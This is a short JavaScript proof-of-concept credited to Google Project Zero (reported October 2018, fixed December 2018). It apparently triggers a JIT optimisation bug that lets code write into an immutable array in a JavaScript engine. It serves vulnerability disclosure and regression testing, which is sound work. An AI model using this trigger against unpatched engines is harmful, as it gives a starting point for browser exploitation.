- Report: Oct 2018
- Fix: Dec 2018
- Credit: lokihardt, Google Project Zero
function set(arr, value) {
arr[0] = value;
}
function getImmutableArrayOrSet(get, value) {
let arr = [1];
if (get)
return arr;
set(arr, value); // This inlinee is for having checkArray not take the paths using the structure comparison.
set({}, 1);
}
function main() {
getImmutableArrayOrSet(true);
for (let i = 0; i < 100; i++) {
getImmutableArrayOrSet(false, {});
}
let arr = getImmutableArrayOrSet(true);
print(arr[0] === 1);
}
main();